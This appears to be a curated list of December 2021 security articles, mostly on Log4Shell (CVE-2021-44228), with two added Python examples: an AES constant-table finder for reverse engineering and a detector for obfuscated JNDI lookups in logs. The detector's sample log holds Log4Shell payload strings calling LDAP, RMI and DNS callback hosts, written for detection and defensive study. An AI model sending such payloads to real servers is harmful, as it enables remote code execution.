Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228 https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/
Cado
Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228
Log4j is an open-source Java logging library embedded in many web platforms and enterprise products. Reports of in-the-wild exploitation began on December 9th, 2021.
CVE-2021-44228 vulnerability in Apache Log4j library https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210
Securelist
CVE-2021-44228 vulnerability in Apache Log4j library
The summary of the critical vulnerability CVE-2021-44228 in the Apache Log4j library, technical details and mitigations.
Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/
Sysdig
Exploiting, Mitigating, and Detecting CVE-2021-44228: Log4j Remote Code Execution (RCE) | Sysdig
CVE-2021-44228 is a CRITICAL vulnerability that lets a remote attacker execute arbitrary code on any machine that logs attacker-controlled input through a vulnerable Log4j 2 version. Mitigation: upgrade Log4j to 2.16.0 or later, which disables JNDI by default and removes message lookups.
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Microsoft News
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
Microsoft is tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2. Get technical info and guidance for using Microsoft security solutions to protect against attacks.
Windows Privilege Escalation: Scheduled Task/Job (T1573.005) https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/
Hacking Articles
Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
Learn how to exploit misconfigured Windows Scheduled Task/Job settings (weak permissions on the task's binary or folder) for privilege escalation. Note that the article's title cites T1573.005; in MITRE ATT&CK the Scheduled Task/Job: Scheduled Task technique is catalogued as T1053.005 (T1573 is Encrypted Channel).
Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html
How I was able to bypass Cloudflare WAF for SQLi payload https://infosecwriteups.com/how-i-was-able-to-bypass-cloudflare-waf-for-sqli-payload-b9e7a4260026
Medium
How I was able to bypass Cloudflare WAF for SQLi payload
Bypassing Cloudflare for achieving SQL Injection
A strategy to land your first pentest job https://blog.pentesterlab.com/a-strategy-to-land-your-first-pentest-job-25209a351689
Pentesterlab
A strategy to land your first pentest job - PentesterLab's Blog
Learn the strategy to get a job in pentesting or web security. Understand different levels of knowledge, from basic to expert, in hacking, code review, and application security. Get insights on how focusing on one category can help you master pentesting and…
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666) https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
Worth reading » A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
projectzero.google
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution - Project Zero
Posted by Ian Beer & Samuel Groß of Google Project Zero We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and...
This shouldn't have happened: A vulnerability postmortem https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html
Blogspot
This shouldn't have happened: A vulnerability postmortem
Posted by Tavis Ormandy, Project Zero Introduction This is an unusual blog post. I normally write posts to highlight some hidden att...
Reverse Engineering Crypto Functions: AES https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions-aes
GoggleHeadedHacker
Reverse Engineering Crypto Functions: AES
This tutorial will show how two methods of implementing the AES algorithm work. It will also demonstrate how to identify these methods in Assembly when reverse engineering an application.
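The tutorial above distinguishes a straightforward byte-oriented S-box implementation from the T-table (combined SubBytes/ShiftRows/MixColumns lookup) style, and both leave recognisable constants in a binary's read-only data. The following is an added example, not code from the GoggleHeadedHacker article: it regenerates the AES S-box from its GF(2^8) definition, derives the forward T-table Te0 in the layout OpenSSL uses, and scans a blob for either. The blob is constructed here for illustration; the offsets in it are arbitrary.

```python
"""Locate AES S-box and T-table constants in a binary blob.

Added example (not from the linked tutorial). The S-box is derived from
the FIPS-197 definition rather than pasted, so the table bytes we search
for are provably the real ones. Te0 follows the OpenSSL aes_core.c layout
Te0[x] = (2*S[x], S[x], S[x], 3*S[x]) packed as a 32-bit word.
"""
from typing import List, Tuple


def _xtime(a: int) -> int:
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    a <<= 1
    if a & 0x100:
        a ^= 0x11B
    return a & 0xFF


def _gmul(a: int, b: int) -> int:
    """General GF(2^8) multiplication by shift-and-add."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = _xtime(a)
        b >>= 1
    return r


def _ginv(a: int) -> int:
    """Multiplicative inverse in GF(2^8); 0 maps to 0 by convention."""
    if a == 0:
        return 0
    for b in range(1, 256):
        if _gmul(a, b) == 1:
            return b
    raise ValueError("no inverse")  # unreachable for a valid field


def build_sbox() -> bytes:
    """S(x) = affine(inv(x)): b = a ^ rotl(a,1) ^ rotl(a,2) ^ rotl(a,3) ^ rotl(a,4) ^ 0x63."""
    out = []
    for x in range(256):
        inv = _ginv(x)
        b = inv
        for i in range(1, 5):
            b ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        out.append(b ^ 0x63)
    return bytes(out)


SBOX = build_sbox()
# Te0[x] = {02}*S[x] || S[x] || S[x] || {03}*S[x]
TE0 = [(_gmul(s, 2) << 24) | (s << 16) | (s << 8) | _gmul(s, 3) for s in SBOX]


def te0_bytes(order: str) -> bytes:
    """Te0 serialised as it would sit in .rodata for the given endianness."""
    return b"".join(v.to_bytes(4, order) for v in TE0)


def find_aes_tables(blob: bytes) -> List[Tuple[str, int]]:
    """Return (table_name, offset) for each AES constant table found in blob.

    A hit on SBOX alone suggests a byte-oriented implementation; a hit on
    Te0 indicates the T-table style the tutorial describes.
    """
    findings = []
    i = blob.find(SBOX)
    if i != -1:
        findings.append(("sbox", i))
    for order in ("big", "little"):
        i = blob.find(te0_bytes(order))
        if i != -1:
            findings.append((f"te0_{order}", i))
    return findings


# Constructed sample "binary": padding, the S-box, more padding, a little-endian Te0.
SAMPLE_BLOB = b"\x90" * 37 + SBOX + b"\x00" * 11 + te0_bytes("little") + b"\xcc" * 5

if __name__ == "__main__":
    for name, off in find_aes_tables(SAMPLE_BLOB):
        print(f"{name} at offset {off:#x}")
```

On a real target, run find_aes_tables over the file bytes (or a dumped .rodata section); compilers keep these tables contiguous, so a hit gives you the address to cross-reference from the disassembly. Decryption-side tables (Td0, the inverse S-box) can be derived the same way if you need them.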
Researcher publishes PoC for Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2021-42287, CVE-2021-42278) https://securityonline.info/researcher-publishes-poc-for-active-directory-domain-services-elevation-of-privilege-vulnerability-cve-2021-42287-cve-2021-42278/
Cybersecurity News
Researcher publishes PoC for Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2021-42287, CVE-2021-42278)
The details of the vulnerability and a PoC for the Microsoft Windows Active Directory Domain Services privilege escalation have been disclosed. The two CVEs chain together: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC confusion over the PAC) let a standard domain user impersonate a domain controller account and obtain domain admin.
Pegasus vs. Predator Dissident’s Doubly-Infected iPhone Reveals Cytrox Mercenary Spyware https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/
The Citizen Lab
Pegasus vs. Predator
Two Egyptians—exiled politician Ayman Nour and the host of a popular news program (who wishes to remain anonymous)—were hacked with Predator spyware, built and sold by the previously little-known mercenary spyware developer Cytrox. The phone of Ayman Nour…
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html
Cisco Talos Blog
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension
By Tiago Pereira.
* Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute malware on their systems.
* This campaign includes a set of malware distribution campaigns that started in late…
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi
Juniper Networks
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI
Juniper Threat Labs has observed variants of the ongoing Log4j CVE-2021-44228 attacks that use an RMI service instead of LDAP.
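The Microsoft hunting guidance and the Juniper observation above both come down to the same detection problem: spot a `${jndi:...}` lookup in logged input, including the obfuscated forms attackers use to evade naive string matching (`${${lower:j}ndi:...}`, `${${::-j}${::-n}...}`, `${${env:NaN:-j}ndi:...}`), and record which callback protocol is in play so a hunter can see the LDAP-to-RMI shift. The example below is added here and is not code from either vendor's post. It normalises nested lookups the way Log4j itself would (default-value, lower and upper lookups only; other lookup types are left literal) and then extracts the scheme and callback host. The log lines are constructed, using RFC 5737 documentation addresses.

```python
"""Detect CVE-2021-44228 JNDI lookups in log lines, obfuscation included.

Added example, not the vendors' code. The normaliser models three Log4j
lookup behaviours attackers abuse for evasion:
  ${key:-default}  -> default   (a failed lookup such as ${env:NaN:-j} or ${::-j})
  ${lower:X}       -> x
  ${upper:x}       -> X
Anything else, including the jndi: lookup itself, is left in place.
"""
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: a body containing no nested braces or '$'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation a JNDI lookup reads ${jndi:<scheme>://<host>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Expand one innermost lookup body, or return None to keep it literal."""
    lower = body.lower()
    if lower.startswith("jndi:"):
        return None  # this is what we want to match later
    if ":-" in body:
        return body.split(":-", 1)[1]  # default value of a failed lookup
    if lower.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lower.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None  # unmodelled lookup (date:, env:, sys:, ...): leave as-is


def normalize(text: str, max_passes: int = 32) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def _sub(m: "re.Match[str]") -> str:
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        text = _INNER.sub(_sub, text)
        if not changed:
            break
    return text


def find_jndi(line: str) -> List[Tuple[str, str]]:
    """Return (scheme, host[:port]) for every JNDI lookup in one log line."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, host) for each hit across a log."""
    hits = []
    for n, line in enumerate(lines, 1):
        for scheme, host in find_jndi(line):
            hits.append((n, scheme, host))
    return hits


# Constructed access-log lines (RFC 5737 addresses); the fifth is benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/Exploit}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=1 HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.11:1389/x}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:14 +0000] "POST /api HTTP/1.1" 200 12 "-" '
    '"${${env:NaN:-j}ndi:dns://203.0.113.13/ping}"',
    '198.51.100.20 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) ${date:yyyy}"',
]

if __name__ == "__main__":
    for n, scheme, host in scan(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={scheme} callback={host}")
```

Grouping hits by scheme over a day of logs makes the protocol shift visible directly; the callback host is the pivot for egress and DNS-log correlation. The normaliser deliberately stops at what Log4j would do, so a string that only looks suspicious but never resolves to `${jndi:` is not reported.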
If You’re Not Doing Continuous Asset Management You’re Not Doing Security https://danielmiessler.com/blog/continuous-asset-management-security/
Danielmiessler
If You’re Not Doing Continuous Asset Management You’re Not Doing Security
April 25, 2018. The more a company can tell me about their assets the better their security is, and the more comprehensive and real-time the inventory is, the mo
A Detailed Guide on Log4J Penetration Testing https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/
Hacking Articles
A Detailed Guide on Log4J Penetration Testing
In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the